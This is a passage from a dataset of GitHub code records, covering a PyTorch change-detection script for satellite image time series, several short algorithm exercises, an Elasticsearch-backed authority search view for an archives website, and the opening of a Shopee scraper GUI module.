image_name_with_extention.startswith(\n # city_name) and not image_name_with_extention.endswith(\"band.TIF\"):\n if image_name_with_extention.endswith(\".TIF\") and not image_name_with_extention.endswith(\"band.TIF\"):\n new_images_list.append(image_name_with_extention)\n img_path = path_datasets + image_name_with_extention\n path_list.append(img_path)\n image_array, H, W, geo, proj, bands_nb = open_tiff(path_datasets,\n os.path.splitext(image_name_with_extention)[0])\n if satellite == \"SPOT5\":\n image_date = (re.search(\"XS_([0-9]*)_\", image_name_with_extention)).group(1)\n if satellite == \"S2\":\n image_date = (re.search(\"S2_([0-9]*).\", image_name_with_extention)).group(1)\n print (image_date)\n if bands_to_keep == 3:\n if satellite == \"SPOT5\":\n image_array = np.delete(image_array, 3, axis=0)\n bands_nb = 3\n if satellite == \"S2\":\n image_array = np.delete(image_array, 0, axis=0)\n bands_nb = 3\n if satellite == \"S2\":\n for b in range(len(image_array)):\n image_array[b][image_array[b] > 4096] = np.max(image_array[b][image_array[b] <= 4096])\n if maskTrue:\n # in our case we have only one mask for the whole SITS, but in case you have separate masks for each couple of images, it can be useful\n path_mask = \"/media/user/DATA/Results/Segmentation_new_outliers_filled/\"\n mask_name = \"Water_city_mask\"\n mask_array, _, _, _, _, _ = open_tiff(path_mask, mask_name)\n mask_array[mask_array > 0] = 10\n image_array_mask = mask_array\n list_image_mask.append(mask_array)\n image_extended = extend(image_array, patch_size)\n list_image_extended.append(image_extended)\n list_image_date.append(image_date)\nlist_image_date = np.asarray(list_image_date, dtype=int)\nsort_ind = np.argsort(list_image_date) # we arrange images by date of acquisition\nlist_image_extended = np.asarray(list_image_extended, dtype=float)[sort_ind]\nnbr_images = len(list_image_extended)\nlist_image_date = np.asarray(list_image_date, dtype=str)\nnew_images_list = np.asarray(new_images_list)[sort_ind]\nif maskTrue:\n list_image_mask = np.asarray(list_image_mask)[sort_ind]\n\n\n\n# We calculate min and max of dataset to perform image rescaling from 0 to 1 later\nlist_norm = []\nfor band in range(len(list_image_extended[0])):\n all_images_band = list_image_extended[:, band, :, :].flatten()\n min = np.min(all_images_band)\n max = np.max(all_images_band)\n list_norm.append([min, max])\n\n\n\nfor im in range(0, len(list_image_extended)-1):\n # We open the pre-trained AE model for every couple of images\n try:\n ae_model_name = \"ae-model_ep_\" + str(epoch_model) + \"_loss_\" + str(loss_model) + \".\" + reference_model\n encoder12, decoder12 = torch.load(path_models + model_folder + \"/\" + ae_model_name + \".pkl\")\n encoder21, decoder21 = torch.load(path_models + model_folder + \"/\" + ae_model_name + \".pkl\")\n except:\n encoder_model_name = \"encoder-model_ep_\" + str(epoch_model) + \"_loss_\" + str(loss_model) + \".\" + reference_model\n decoder_model_name = \"decoder-model_ep_\" + str(epoch_model) + \"_loss_\" + str(loss_model) + \".\" + reference_model\n encoder12 = torch.load(path_models + model_folder + \"/\" + encoder_model_name + \".pkl\")\n decoder12 = torch.load(path_models + model_folder + \"/\" + decoder_model_name + \".pkl\")\n encoder21 = torch.load(path_models + model_folder + \"/\" + encoder_model_name + \".pkl\")\n decoder21 = torch.load(path_models + model_folder + \"/\" + decoder_model_name + \".pkl\")\n\n if gpu:\n encoder12 = encoder12.cuda() # On GPU\n decoder12 = decoder12.cuda() # On GPU\n encoder21 = encoder21.cuda() # On GPU\n decoder21 = decoder21.cuda() # On GPU\n\n\n # Here we have to choose the images timestamps (whether it is t and t+1 or t and t+2)\n image_name1 = os.path.splitext(new_images_list[im])[0]\n image_date1 = list_image_date[im]\n\n image_name2 = os.path.splitext(new_images_list[im+1])[0]\n image_date2 = list_image_date[im+1]\n\n print(image_date1, image_date2)\n\n\n folder_results = folder_pretrained_results +\"t_t1/\" + \"Joint_AE_\"+image_date1 + \"_\" +image_date2 + \"_ep_\" + str(epoch_nb) + \"_patch_\" + str(patch_size) + run_name\n path_results = os.path.expanduser('~/Desktop/Results/RESULTS_CHANGE_DETECTION/NN_'+city_name+'_'+str(satellite)+'_all_images_model_pretrained/') + folder_results +\"/\"\n\n\n # we check if this changes are already computed\n if os.path.exists(path_results):\n continue\n\n\n create_dir(path_results)\n\n path_model = path_results + 'model'+run_name+\"/\" #we will save the encoder/decoder models here\n create_dir(path_model)\n\n\n driver_tiff = gdal.GetDriverByName(\"GTiff\")\n driver_shp = ogr.GetDriverByName(\"ESRI Shapefile\")\n\n\n image_array1, H, W, geo, proj, bands_nb = open_tiff(path_datasets, image_name1)\n image_array2, H, W, geo, proj, bands_nb = open_tiff(path_datasets, image_name2)\n if bands_to_keep == 3:\n if satellite == \"SPOT5\":\n image_array1 = np.delete(image_array1, 3, axis=0)\n image_array2 = np.delete(image_array2, 3, axis=0)\n bands_nb = 3\n if satellite == \"S2\":\n image_array1 = np.delete(image_array1, 0, axis=0)\n image_array2 = np.delete(image_array2, 0, axis=0)\n bands_nb = 3\n if satellite == \"S2\":\n for b in range(len(image_array)):\n image_array[b][image_array[b]>4096] = np.max(image_array[b][image_array[b]<=4096])\n\n\n\n image_extended1 = extend(image_array1, patch_size).astype(float)\n image_extended2 = extend(image_array2, patch_size).astype(float)\n\n\n\n for band in range(len(image_extended1)):\n image_extended1[band] = (image_extended1[band] - list_norm[band][0])/(list_norm[band][1]-list_norm[band][0])\n image_extended2[band] = (image_extended2[band] - list_norm[band][0])/(list_norm[band][1]-list_norm[band][0])\n\n if sampleTrue:\n nbr_patches_per_image = int(H * W / 2)\n samples_list = np.sort(sample(range(H * W), nbr_patches_per_image))\n image = ImageDataset(image_extended1, image_extended2, patch_size,\n samples_list) # we create a dataset with tensor patches\n loader = dsloader(image, gpu, batch_size=batch_size, shuffle=True)\n\n elif maskTrue:\n mask = np.where((list_image_mask[im] + list_image_mask[im+1]).flatten() == 0)[0]\n image = ImageDataset(image_extended1, image_extended2, patch_size,\n mask) # we create a dataset with tensor patches\n loader = dsloader(image, gpu, batch_size, shuffle=True)\n\n else:\n image = ImageDataset(image_extended1, image_extended2, patch_size,\n list(range(H * W))) # we create a dataset with tensor patches\n loader = dsloader(image, gpu, batch_size=batch_size, shuffle=True)\n\n image_enc = ImageDataset(image_extended1, image_extended2, patch_size,\n list(range(H * W))) # we create a dataset with tensor patches\n\n\n #we save everything to stats file\n with open(path_results+\"stats.txt\", 'a') as f:\n f.write(\"Relu activations for every layer except the last one. The last one is not activated\" + \"\\n\")\n f.write(\"patch_size=\" + str(patch_size) + \"\\n\")\n f.write(\"epoch_nb=\" + str(epoch_nb) + \"\\n\")\n f.write(\"batch_size=\" + str(batch_size) + \"\\n\")\n f.write(\"learning_rate=\" + str(learning_rate) + \"\\n\")\n f.write(\"sample=\" + str(sampleTrue) + \"\\n\")\n f.close()\n\n\n optimizer = torch.optim.Adam((list(encoder12.parameters()) + list(decoder12.parameters()) + list(encoder21.parameters()) + list(decoder21.parameters())), lr=learning_rate)\n criterion = nn.MSELoss() #loss function\n\n with open(path_results+\"stats.txt\", 'a') as f:\n f.write(str(encoder12) + \"\\n\")\n f.close()\n\n start_time = time.time()\n\n\n # function to fine-tune the model\n epoch_loss_list = []\n epoch_loss12_list = []\n epoch_loss21_list = []\n def train(epoch):\n # we have separate encoder/decoder models for both AE\n encoder12.train() #we swich to train mode (by default)\n decoder12.train()\n encoder21.train() #we swich to train mode (by default)\n decoder21.train()\n total_loss = 0\n total_loss12 = 0\n total_loss21 = 0\n for batch_idx, (data1, data2, _) in enumerate(loader): #we load batches from model\n if gpu:\n data1 = data1.cuda()\n data2 = data2.cuda()\n # if/else allow us to manipulate different types of models with different input/output\n if type_of_return == list_types_of_return[0]:\n encoded12 = encoder12(Variable(data1))\n encoded21 = encoder21(Variable(data2))\n decoded12 = decoder12(encoded12)\n decoded21 = decoder21(encoded21)\n if type_of_return == list_types_of_return[1]:\n encoded12, id1 = encoder12(Variable(data1))\n decoded12 = decoder12(encoded12, id1)\n encoded21, id1 = encoder21(Variable(data2))\n decoded21 = decoder21(encoded21, id1)\n encoded21_copy = encoded21.clone().detach()\n encoded12_copy = encoded12.clone().detach()\n\n loss11 = criterion(encoded12, (encoded12_copy+encoded21_copy)/2)\n loss22 = criterion(encoded21, (encoded12_copy+encoded21_copy)/2)\n total_loss += loss11.item() #total loss for the epoch\n loss12 = criterion(decoded12, Variable(data2))\n total_loss12 += loss12.item()\n loss21 = criterion(decoded21, Variable(data1))\n total_loss21 += loss21.item()\n optimizer.zero_grad() #everything to optimize the model\n loss11.backward(retain_graph=True)\n loss22.backward(retain_graph=True)\n loss12.backward(retain_graph=True)\n loss21.backward()\n optimizer.step()\n if (batch_idx+1) % 200 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.7f}\\tLoss12: {:.7f}\\tLoss21: {:.7f}'.format(\n (epoch+1), (batch_idx+1) * batch_size, len(loader.dataset),\n 100. * (batch_idx+1) / len(loader), loss11.item(), loss12.item(), loss21.item()))\n epoch_loss = total_loss / len(loader) #avg loss per epoch\n epoch_loss_list.append(epoch_loss)\n epoch_loss12 = total_loss12 / len(loader) #avg loss per epoch\n epoch_loss12_list.append(epoch_loss12)\n epoch_loss21 = total_loss21 / len(loader) #avg loss per epoch\n epoch_loss21_list.append(epoch_loss21)\n epoch_stats = \"Epoch {} Complete: Avg. Loss: {:.7f}\\tAvg. Loss12: {:.7f}\\tAvg. Loss21: {:.7f}\".format(epoch + 1, epoch_loss, epoch_loss12, epoch_loss21)\n print(epoch_stats)\n with open(path_results + \"stats.txt\", 'a') as f:\n f.write(epoch_stats+\"\\n\")\n f.close()\n\n #we save all the models to choose the best afterwards\n torch.save([encoder12, decoder12], (path_model+'ae12-model_ep_'+str(epoch+1)+\"_loss_\"+str(round(epoch_loss12, 7))+run_name+'.pkl') )\n torch.save([encoder21, decoder21], (path_model+'ae21-model_ep_'+str(epoch+1)+\"_loss_\"+str(round(epoch_loss21, 7))+run_name+'.pkl') )\n\n\n for epoch in range(epoch_nb):\n if epoch==3:\n learning_rate = 0.00005\n optimizer = torch.optim.Adam((list(encoder12.parameters()) + list(decoder12.parameters()) + list(encoder21.parameters()) + list(decoder21.parameters())), lr=learning_rate)\n\n with open(path_results + \"stats.txt\", 'a') as f:\n f.write(\"new_learning_rate=\" + str(learning_rate) + \"\\n\")\n f.close()\n train(epoch)\n\n\n # we compute fine-tuning time\n end_time = time.time()\n total_time_learning = end_time - start_time\n total_time_learning = str(datetime.timedelta(seconds=total_time_learning))\n print(\"Total time fine-tuning =\", total_time_learning)\n\n with open(path_results+\"stats.txt\", 'a') as f:\n f.write(\"Total time fine-tuning =\" + str(total_time_learning) + \"\\n\"+\"\\n\")\n f.close()\n\n # we performe feature translation and compute the reconstruction loss to detect the change areas\n # we create data loader for the fine-tuning\n loader = dsloader(image_enc, gpu, batch_size=2000, shuffle=False)\n\n criterion = nn.MSELoss(reduce=False)\n\n for best_epoch in range(1, epoch_nb+1):\n # we choose the best epoch for reconstruction (in the article we fine-tune for only one epoch, so it does not change anything in this particular case)\n best_epoch_loss12 = epoch_loss12_list[best_epoch-1]\n best_epoch_loss21 = epoch_loss21_list[best_epoch-1]\n # we load this model\n best_encoder12, best_decoder12 = torch.load(path_model + 'ae12-model_ep_' + str(best_epoch) + \"_loss_\" + str(round(best_epoch_loss12, 7)) + run_name + '.pkl')\n best_encoder21, best_decoder21 = torch.load(path_model + 'ae21-model_ep_' + str(best_epoch) + \"_loss_\" + str(round(best_epoch_loss21, 7)) + run_name + '.pkl')\n\n if gpu:\n best_encoder12 = best_encoder12.cuda() # On GPU\n best_encoder21 = best_encoder21.cuda() # On GPU\n best_decoder12 = best_decoder12.cuda() # On GPU\n best_decoder21 = best_decoder21.cuda() # On GPU\n\n name_results12 = \"From_\" + image_date1 + \"_to_\" + image_date2 + \"_ep_\" + str(best_epoch)\n name_results21 = \"From_\" + image_date2 + \"_to_\" + image_date1 + \"_ep_\" + str(best_epoch)\n\n\n new_coordinates_loss_mean12 = []\n new_coordinates_loss_mean21 = []\n\n best_encoder12.eval()\n best_decoder12.eval()\n best_encoder21.eval()\n best_decoder21.eval()\n for batch_idx, (data1, data2, _) in enumerate(loader): # we load batches from model\n if gpu:\n data1 = data1.cuda()\n data2 = data2.cuda()\n #index = index.cuda(async=True)\n if type_of_return == list_types_of_return[0]:\n encoded12 = best_encoder12(Variable(data1))\n decoded12 = best_decoder12(encoded12)\n encoded21 = best_encoder21(Variable(data2))\n decoded21 = best_decoder21(encoded21)\n if type_of_return == list_types_of_return[1]:\n encoded12, id1 = best_encoder12(Variable(data1))\n decoded12 = best_decoder12(encoded12, id1)\n encoded21, id1 = best_encoder21(Variable(data2))\n decoded21 = best_decoder21(encoded21, id1)\n\n loss12 = criterion(decoded12, Variable(data2))\n loss21 = criterion(decoded21, Variable(data1))\n\n loss_mean12 = loss12.view(-1, bands_nb, patch_size*patch_size).mean(2).mean(1)\n loss_mean21 = loss21.view(-1, bands_nb, patch_size*patch_size).mean(2).mean(1)\n\n if gpu:\n new_coordinates_loss_batch_mean12 = loss_mean12.data.cpu().numpy()\n new_coordinates_batch12 = decoded12.data.cpu().numpy()\n new_coordinates_loss_batch_mean21 = loss_mean21.data.cpu().numpy()\n new_coordinates_batch21 = decoded21.data.cpu().numpy()\n else:\n new_coordinates_loss_batch_mean12 = loss_mean12.data.numpy()\n new_coordinates_batch12 = decoded12.data.numpy()\n new_coordinates_loss_batch_mean21 = loss_mean21.data.numpy()\n new_coordinates_batch21 = decoded21.data.numpy()\n\n\n new_coordinates_loss_mean12.append(list(new_coordinates_loss_batch_mean12))\n new_coordinates_loss_mean21.append(list(new_coordinates_loss_batch_mean21))\n\n if (batch_idx + 1) % 200 == 0:\n print('Encoding : [{}/{} ({:.0f}%)]'.format(\n (batch_idx + 1) * batch_size, len(loader.dataset),\n 100. * (batch_idx + 1) / len(loader)))\n\n print(len(new_coordinates_loss_mean12))\n new_coordinates_loss_mean12 = np.asarray(new_coordinates_loss_mean12).flatten()\n new_coordinates_loss_mean21 = np.asarray(new_coordinates_loss_mean21).flatten()\n\n if maskTrue:\n defected_mask = np.setdiff1d(np.arange(H*W), mask)\n new_coordinates_loss_mean12[defected_mask] = 0\n new_coordinates_loss_mean21[defected_mask] = 0\n else:\n defected_mask = None\n mask = None\n\n # We create a loss image in new coordinate system\n image_array_tr_mean = np.reshape(new_coordinates_loss_mean12, (H, W))\n loss_image_name_mean = name_results12\n loss_image_mean = path_results + \"Loss_mean_\" + loss_image_name_mean + \".TIF\"\n dst_ds = create_tiff(1, loss_image_mean, W, H, gdal.GDT_Float32, image_array_tr_mean, geo, proj)\n dst_ds = None\n image_array_loss1 = image_array_tr_mean\n\n\n # We create a loss image in new coordinate system\n image_array_tr_mean = np.reshape(new_coordinates_loss_mean21, (H, W))\n loss_image_name_mean = name_results21\n loss_image_mean = path_results + \"Loss_mean_\" + loss_image_name_mean + \".TIF\"\n dst_ds = create_tiff(1, loss_image_mean, W, H, gdal.GDT_Float32, image_array_tr_mean, geo, proj)\n dst_ds = None\n image_array_loss2 = image_array_tr_mean\n\n # we compute otsu thresholding for 2 different threshold paratemers 0.095 and 0.098\n # the parameter \"changes\" is used only when we have a GT change map for this couple of images and we want to compute accuracy statistics\n otsu(image_array_loss1, image_array_loss2, H, W, geo, proj, path_results, image_date1 + \"_to_\" + image_date2, threshold=0.995, changes=None, mask=mask)\n otsu(image_array_loss1, image_array_loss2, H, W, geo, proj, path_results, image_date1 + \"_to_\" + image_date2, threshold=0.998, changes=None, mask=mask)","repo_name":"ekalinicheva/Unsupervised-CD-in-SITS-using-DL-and-Graphs","sub_path":"Bitemporal_change_detection/main_finetuning.py","file_name":"main_finetuning.py","file_ext":"py","file_size_in_byte":20877,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"71"} +{"seq_id":"13392710369","text":"# https://www.codechef.com/problems/XORAND\nimport math\nfor _ in range(int(input())):\n n=int(input())\n a=list(map(int,input().split()))\n count=[0]*31\n for x in a:\n count[int(math.log2(x))]+=1\n ans=0\n for x in count:\n ans+=int((x*x-x)/2) \n print(ans) ","repo_name":"abhik2003/my_cp","sub_path":"XORAND.py","file_name":"XORAND.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34835687508","text":"from heapq import heappush, heappop\ndef Floyd(graph, x, k):\n for i in range(1, len(graph)):\n for a in range(1,len(graph)):\n for b in range(1,len(graph)):\n graph[a][b]=min(graph[a][b], graph[a][i]+graph[i][b])\n graph[b][a]=min(graph[a][b], graph[a][i]+graph[i][b])\n\n return graph[1][k]+graph[k][x] if graph[1][k]+graph[k][x] < int(1e9) else -1\n\ndef dijkstra(graph, x):\n q=[]\n distance=[int(1e9)]*len(graph)\n distance[x]=0\n heappush(q,(0,x))\n while q:\n dist_of_vertex, vertex=heappop(q)\n if dist_of_vertex > distance[vertex]: continue\n for adj in graph[vertex]:\n cost=distance[vertex]+1\n if cost < distance[adj]:\n distance[adj]=cost\n heappush(q, (cost, adj))\n return distance\n\ndef dijstra_solution(graph, x, k):\n dijk_from_start=dijkstra(graph,1)\n dijk_from_k=dijkstra(graph,k)\n return dijk_from_start[k]+dijk_from_k[x] if dijk_from_start[k]+dijk_from_k[x] < int(1e9) else -1\n\nif __name__==\"__main__\":\n v, e = map(int, input().split())\n graph=[[int(1e9)]*(v+1) for _ in range(v+1)]\n dijkgraph=[[] for _ in range((v+1))]\n\n for i in range(v+1): graph[i][i]=0\n for i in range(e):\n a,b=map(int, input().split())\n graph[a][b]=1\n graph[b][a]=1\n\n dijkgraph[a].append(b)\n dijkgraph[b].append(a)\n\n x, k = map(int, input().split())\n print(Floyd(graph,x,k))\n print(dijstra_solution(dijkgraph, x, k))","repo_name":"yunhacho/SelfStudy","sub_path":"Algorithm/이것이코딩테스트다/최단경로/미래도시.py","file_name":"미래도시.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30312331549","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n if lists is None or len(lists) == 0:\n return None\n\n while len(lists) > 1:\n merged = []\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i+1] if (i+1) < len(lists) else None\n merged.append(self.merge2Lists(l1, l2))\n lists = merged\n return lists[0]\n\n def merge2Lists(self, l1, l2):\n head = dummy = ListNode()\n while l1 and l2:\n if l1.val <= l2.val:\n head.next = l1\n l1 = l1.next\n else:\n head.next = l2\n l2 = l2.next\n head = head.next\n\n if l1:\n head.next = l1\n else:\n head.next = l2\n\n return dummy.next\n","repo_name":"lucasnbsb/Data-Structures-and-Algorithms","sub_path":"problems/3 hard/23. Merge k Sorted Lists.py","file_name":"23. Merge k Sorted Lists.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23492226416","text":"from string import ascii_uppercase\n\nfrom elasticsearch_dsl.search import Search\nfrom elasticsearch.exceptions import ConnectionError, RequestError\nfrom elasticsearch_dsl import query as dsl_query\n\nfrom cwtags import tag as T\n\nfrom logilab.common.decorators import cachedproperty\n\nfrom cubicweb import _\nfrom cubicweb.rset import ResultSet\n\nfrom cubicweb_elasticsearch.views import ElasticSearchView\n\nfrom cubicweb_francearchives.views import get_template, rebuild_url, format_number\n\nfrom . import PaginationMixin, FakeResponse\n\n\nLETTERS_TO_LABEL = {\"#\": _(\"others alphabets\"), \"0\": _(\"0-9\"), \"!\": _(\"punctuation\")}\n\n\nclass PniaAuthoritiesElasticSearchView(PaginationMixin, ElasticSearchView):\n __abstract__ = True\n title_count_templates = (_(\"No result\"), _(\"1 result\"), _(\"{count} results\"))\n template = get_template(\"searchlist.jinja2\")\n cw_etype = \"SubjectAuthority\"\n items_per_page_options = [100, 200]\n default_items_per_page = 100\n\n @property\n def breadcrumbs(self):\n breadcrumbs = [(self._cw.build_url(\"\"), self._cw._(\"Home\"))]\n breadcrumbs.append((None, self._cw._(self.title)))\n return breadcrumbs\n\n def add_css(self):\n self._cw.add_css(\"css/font-awesome.css\")\n\n def add_js(self):\n self._cw.add_js(\"cubes.pnia_search.js\")\n\n @cachedproperty\n def xiti_chapters(self):\n return [\"Authorities\", self.__regid__]\n\n # XXX This page does not have a query string, to modify or remove\n @cachedproperty\n def cached_search_response(self):\n query_string = self._cw.form.get(\"q\")\n if hasattr(self, \"_esresponse\"):\n return self._esresponse, query_string\n try:\n self._esresponse = self.do_search(query_string)\n except Exception as err:\n self.exception(err)\n self._esresponse = FakeResponse()\n\n return self._esresponse, query_string\n\n def build_results(self, response):\n rset = self.rset_from_response(response)\n if not rset:\n return []\n results = []\n for entity, item_response in zip(rset.entities(), response):\n try:\n entity.complete()\n except Exception:\n self.exception(\n \"failed to build entity with eid %s (ES says etype is %s)\",\n entity.eid,\n getattr(item_response, \"cw_etype\", \"?\"),\n )\n continue\n results.append(entity.view(\"pniasearch-item\", es_response=item_response))\n return results\n\n def format_results_title(self, response):\n count = response.hits.total.value if response is not None else 0\n if count == 0:\n tmpl = self.title_count_templates[0]\n elif count == 1:\n tmpl = self.title_count_templates[1]\n else:\n tmpl = self.title_count_templates[2]\n return self._cw._(tmpl).format(count=format_number(count, self._cw))\n\n def customize_search(self, query_string, facet_selections, start=0, stop=10, **kwargs):\n \"\"\"\n This is where one can customize the search by modifying the\n query string and facet selection in an inherited class.\n\n \"\"\"\n stop = stop if stop != 10 else self.default_items_per_page\n cwconfig = self._cw.vreg.config\n index_name = f\"{cwconfig['index-name']}_suggest\"\n search = Search(doc_type=\"_doc\", index=index_name).sort(\"text.raw\")\n must = [\n {\"match\": {\"cw_etype\": self.cw_etype}},\n {\"match\": {\"quality\": True}},\n {\"range\": {\"count\": {\"gte\": 1}}},\n ]\n fulltext_string = self._cw.form.get(\"fulltext_facet\", \"\").strip()\n if fulltext_string:\n must.append(\n dsl_query.SimpleQueryString(\n \"simple_query_string\",\n query=fulltext_string,\n fields=[\"text\"],\n default_operator=\"and\",\n )\n )\n letter = self._cw.form.get(\"let\")\n if letter:\n must.append({\"match\": {\"letter\": letter}})\n search.query = dsl_query.Bool(must=must)\n return search[start:stop]\n\n def rset_from_response(self, response):\n \"\"\"transform an ES response into a CubicWeb rset\n\n This consists in iterating on current panigated response and\n inspect the ``cw_etype`` and ``eid`` document fields.\n\n NOTE: some etypes used for the ES indexation are not part of the\n actual CubicWeb schema and therefore require to be mapped on a\n valid entity type (e.g. ExternRef's reftypes)\n\n others, e.g Card are not indexed with their own etypes\n \"\"\"\n\n def get_etype_from_result(result):\n return getattr(result, \"cw_etype\", self.cw_etype)\n\n req = self._cw\n descr, rows = [], []\n for idx, result in enumerate(response):\n # safety belt, in v0.6.0, PDF are indexed without a cw_etype field\n cw_etype = get_etype_from_result(result)\n # safety belt for import-ead with esonly=True: in that case,\n # ES documents don't have eids\n if not result.eid:\n # must not happen\n continue\n else:\n eid = result.eid\n descr.append((cw_etype, \"String\"))\n rows.append([eid, \"foo\"])\n rset = ResultSet(rows, \"Any X\", description=descr)\n rset.req = req\n return rset\n\n def search_summary(self):\n summary = []\n _ = self._cw._\n active_letter = self._cw.form.get(\"let\", \"\").strip()\n if active_letter:\n reset_url = rebuild_url(self._cw, **{\"let\": None})\n value = LETTERS_TO_LABEL.get(active_letter, \"\")\n if not value:\n value = f'\"{active_letter.upper()}\"'\n summary.append({\"name\": _(\"Starts with\"), \"value\": [(value, reset_url)]})\n key = \"fulltext_facet\"\n value = self._cw.form.get(key, \"\").strip()\n if value:\n reset_url = rebuild_url(self._cw, **{key: None})\n summary.append({\"name\": _(\"Contains\"), \"value\": [(value, reset_url)]})\n return {\"summary\": summary}\n\n def get_header_attrs(self):\n return {\"title\": self._cw._(self.title)}\n\n def letters(self, entity=None):\n data = {}\n active_letter = self._cw.form.get(\"let\", \"\")\n data[\"all\"] = [\n (self._cw._(\"all\"), self._cw.build_url(), \"all active\" if not active_letter else \"all\")\n ]\n letters = []\n for letter in ascii_uppercase:\n lower = letter.lower()\n letters.append(\n (\n letter,\n self._cw.build_url(let=lower),\n \"letter active\" if lower == active_letter else \"letter\",\n )\n )\n # 0-9\n data[\"letters\"] = letters\n return data\n\n def reset_all_facets_link(self):\n \"\"\"Creates a URL which resets the values from the facets to display\n\n The value of the initial query (parameter q) is kept\n as well as values which come from other SearchView\n \"\"\"\n url_params = {}\n facets = self.facets_to_display\n for facet in facets:\n url_params[\"es_{}\".format(facet[0])] = None\n for key in (\"fulltext_facet\", \"es_date_min\", \"es_date_max\", \"let\"):\n url_params[key] = None\n return rebuild_url(self._cw, **url_params)\n\n def call(self, context=None, **kwargs):\n self.add_js()\n self.add_css()\n try:\n response, query_string = self.cached_search_response\n except ConnectionError:\n self.w(\n T.div(\n self._cw._(\"failed to connect to elasticsearch\"),\n Class=\"alert alert-info\",\n role=\"alert\",\n )\n )\n return\n except RequestError:\n self.exception(\"ES search failed\")\n self.w(\n T.div(\n self._cw._(\"there was a problem with the elasticsearch request\"),\n Class=\"alert alert-info\",\n role=\"alert\",\n )\n )\n return\n except KeyError:\n self.exception(f\"Key error on {self.__class__} do_search\")\n response = FakeResponse()\n # FIXME fulltext don't work\n fulltext_params = self._cw.form.copy()\n fulltext_value = fulltext_params.pop(\"fulltext_facet\", \"\")\n fulltext_params.pop(\"page\", None)\n for key, value in fulltext_params.items():\n if not isinstance(value, (tuple, list)):\n fulltext_params[key] = [value]\n\n first_previous_pages, next_last_pages = self.pagination(response.hits.total.value)\n self.w(\n self.template.render(\n req=self._cw,\n _=self._cw._,\n response=response,\n display_facets=True,\n results_title=self.format_results_title(response),\n display_fulltext_facet=True,\n fulltext_form_action=self._cw.build_url(\n self._cw.relative_path(includeparams=False)\n ),\n fulltext_params=fulltext_params,\n fulltext_value=fulltext_value,\n search_results=self.build_results(response),\n search_summary=self.search_summary(),\n reset_all_facets_link=self.reset_all_facets_link(),\n first_previous_pages=first_previous_pages,\n next_last_pages=next_last_pages,\n header=self.get_header_attrs(),\n letters=self.letters(),\n items_per_page_links=self.items_per_page_links(),\n display_sort_options=False,\n page_number_params=self.page_number_params(),\n page_number_form_action=self._cw.build_url(\n self._cw.relative_path(includeparams=False)\n ),\n current_page=int(self._cw.form.get(\"page\", 1)),\n number_of_pages=self.number_of_pages(response.hits.total.value),\n )\n )\n\n\nclass PniaSubjectAuthoriesElasticSearchView(PniaAuthoritiesElasticSearchView):\n __regid__ = \"subjects\"\n cw_etype = \"SubjectAuthority\"\n title = _(\"Themes\")\n title_count_templates = (_(\"No themes\"), _(\"1 theme\"), _(\"{count} themes\"))\n\n\nclass PniaAgentAuthoriesElasticSearchView(PniaAuthoritiesElasticSearchView):\n __regid__ = \"agents\"\n cw_etype = \"AgentAuthority\"\n title = _(\"Persons/organizations\")\n title_count_templates = (\n _(\"No persons/organizations\"),\n _(\"1 person/organization\"),\n _(\"{count} persons/organizations\"),\n )\n\n\nclass PniaLocationAuthoriesElasticSearchView(PniaAuthoritiesElasticSearchView):\n __regid__ = \"locations\"\n cw_etype = \"LocationAuthority\"\n title = _(\"Locations\")\n title_count_templates = (_(\"No locations\"), _(\"1 location\"), _(\"{count} locations\"))\n","repo_name":"culturecommunication/francearchives-cubicweb","sub_path":"cubicweb_francearchives/views/search/authorities.py","file_name":"authorities.py","file_ext":"py","file_size_in_byte":11064,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"34462796924","text":"from sys import argv\n\n\ndef _is_leap_year(year: int) -> bool:\n if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\n return True\n return False\n\n\ndef check_date(date: str) -> bool:\n long_month = (1, 3, 7, 8, 10, 12)\n day, month, year = map(int, date.split('.'))\n if year < 0 or year > 9999:\n return False\n if month < 1 or month > 12:\n return False\n if day < 1 or day > 31:\n return False\n if month not in long_month and day > 30:\n return False\n if month == 2:\n if _is_leap_year(year):\n if day > 29:\n return False\n else:\n if day > 28:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n if len(argv) > 1:\n if not check_date(argv[1]):\n print(f\"Некорректная дата {argv[1]}\")\n exit(-1)\n","repo_name":"DmitriyKardava/gb_deep_python","sub_path":"lesson6/datecheck/datecheck.py","file_name":"datecheck.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31623528828","text":"# @Time : 2022-08-10 21:33\n# @Author : Phalange\n# @File : 2169. 得到 0 的操作数.py\n# @Software: PyCharm\n# C'est la vie,enjoy it! :D\n\n\nclass Solution:\n def countOperations(self, num1: int, num2: int) -> int:\n ops = 0\n while num1 != 0 and num2 != 0:\n if num1 >= num2:\n num1 -=num2\n else:\n num2 -=num1\n ops +=1\n\n return ops","repo_name":"enternityFan/LeetCodePythonVersion","sub_path":"模拟/2169. 得到 0 的操作数.py","file_name":"2169. 得到 0 的操作数.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40077577529","text":"# -*- coding: UTF-8 -*-\nfrom numpy import not_equal, ushort\nimport requests\nfrom requests import status_codes\nimport pandas as pd\nimport emoji\nfrom datetime import datetime\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import QBrush, QImage, QPixmap, QColor, QDesktopServices\nfrom PyQt5.QtCore import QUrl\n\n\nfrom . import ShopeeSearch\nfrom GUI import GUI_Shop\nfrom GUI import GUI_Comment\nimport Function\n\n\nclass 